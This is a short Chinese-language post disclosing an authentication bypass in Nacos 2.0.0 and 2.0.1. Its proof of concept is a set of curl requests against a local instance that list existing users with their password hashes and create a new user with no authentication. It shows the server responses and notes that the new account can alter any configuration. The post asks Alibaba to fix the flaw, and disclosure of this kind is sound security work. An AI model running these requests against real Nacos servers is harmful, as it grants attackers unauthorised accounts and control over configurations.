最新版NACOS，惊现绕过鉴权！安全漏洞！

1、漏洞描述：通过post用户接口，可直接添加高权限用户。（无需鉴权）

2、测试版本：nacos2.0.0，nacos2.0.1

3、漏洞复现：

（1）访问用户列表接口，可直接返回已有用户信息

curl -XGET 'http://127.0.0.1:8848/nacos/v1/auth/users?pageNo=1&pageSize=9'

{"totalCount":1,"pageNumber":1,"pagesAvailable":1,"pageItems":[{"username":"nacos","password":"$2a$10$EuWPZHzz32dJN7jexM34MOeYirDdFAZm2kuWj7VEOJhhZkDrxfvUu"}]}

 （2）添加新用户

curl -XPOST 'http://127.0.0.1:8848/nacos/v1/auth/users?username=test&password=test'

{"code":200,"message":"create user ok!","data":null}

（3）再次查看用户列表接口，发现用户已添加。

curl -XGET 'http://127.0.0.1:8848/nacos/v1/auth/users?pageNo=1&pageSize=9'   
       
{"totalCount":2,"pageNumber":1,"pagesAvailable":1,"pageItems":[{"username":"nacos","password":"$2a$10$EuWPZHzz32dJN7jexM34MOeYirDdFAZm2kuWj7VEOJhhZkDrxfvUu"},{"username":"test","password":"$2a$10$hZPXk5btmHOUONcY7.K1lO.f/xt9uiXiCHUCgitIuAWfGNYuUUvXy"}]}

（4）用新增用户登录nacos页面，发现可增删改查任何配置文件。 

 

4、如此重大安全漏洞希望阿里团队可以尽快修复。